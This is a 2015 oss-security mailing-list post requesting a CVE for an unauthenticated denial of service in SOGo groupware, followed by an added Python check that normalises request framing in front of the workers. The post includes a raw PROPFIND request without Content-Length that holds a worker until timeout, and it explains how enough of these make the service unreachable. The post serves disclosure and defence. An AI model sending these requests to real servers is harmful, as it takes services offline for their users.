Date: Tue, 7 Jul 2015 13:53:21 +0200
From: Stefan Castille <stefan.castille@...nierdigital.se>
To: <oss-security@...ts.openwall.com>
Subject: CVE Request for sogO Open Source Groupware (www.sogo.nu)

Hej,

I would like to request a CVE for a DoS in sogo. While it does not crash
the system, it does make it very easy to conduct a DoS against the
application.


Software: sogo
Vendor: Inverse
Site: www.sogo.nu
Previously requested: No
Type: DoS
Description: Due to incorrect handling of certain PROPFIND requests, the
site is vulnerable to a DoS.

-----------------------------------
PROPFIND /SOGo/dav/ HTTP/1.1
Host: <hostname>
Connection: keep-alive
Content-Length: 0


------------------------------------

will return almost immediately

-----------------------------------
PROPFIND /SOGo/dav/ HTTP/1.1
Host: myhost
Connection: keep-alive


-----------------------------------
without the Content-Length will keep the child process occupied until it
times out. The default value is one minute. With only <#processes> requests per
<timeout> the application can be rendered inaccessible.

No authentication/valid account is required. The bug has been reported
at www.sogo.nu/bugs as a private bug report, but labelled won't fix as it
is 'how servers work' and that tuning the timeout will help. I disagree
and would like to get a CVE for it.


with kind regards,
Stefan
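
Added example (not part of the original post and not SOGo code): a framing check that a front end placed before the workers could apply to the two requests quoted above. Per RFC 7230 section 3.3.3, a request with neither Transfer-Encoding nor Content-Length has a zero-length body, so the check makes that explicit. The function names, the method list and the placement in front of the workers are assumptions.

```python
# Added example: framing check for DAV requests before they reach a worker.
# Function names and BODY_METHODS are assumptions, not SOGo code.

BODY_METHODS = {"PROPFIND", "PROPPATCH", "REPORT", "PUT", "POST"}

def parse_head(raw: bytes):
    """Return (method, target, headers) from a raw request head."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        raise ValueError("malformed request line")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        # No colon, empty name, or whitespace around the name is malformed.
        if not sep or not name or name != name.strip():
            raise ValueError("malformed header line")
        headers[name.lower()] = value.strip()
    return parts[0], parts[1], headers

def framing_decision(raw: bytes) -> str:
    """Classify a request: 'pass', 'add-content-length-0' or 'reject-400'."""
    try:
        method, _target, headers = parse_head(raw)
    except ValueError:
        return "reject-400"
    if "transfer-encoding" in headers:
        return "pass"  # body length is defined by the transfer coding
    length = headers.get("content-length")
    if length is not None:
        ok = length.isascii() and length.isdigit()
        return "pass" if ok else "reject-400"
    # Neither framing header: the body is zero-length, so say so explicitly
    # for methods where the backend might otherwise wait for a body.
    return "add-content-length-0" if method in BODY_METHODS else "pass"

# The two requests from the post; the host name is a constructed placeholder.
WITH_LENGTH = (b"PROPFIND /SOGo/dav/ HTTP/1.1\r\nHost: example.invalid\r\n"
               b"Connection: keep-alive\r\nContent-Length: 0\r\n\r\n")
WITHOUT_LENGTH = (b"PROPFIND /SOGo/dav/ HTTP/1.1\r\nHost: example.invalid\r\n"
                  b"Connection: keep-alive\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("with", WITH_LENGTH), ("without", WITHOUT_LENGTH)):
        print(label, "Content-Length ->", framing_decision(req))
```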
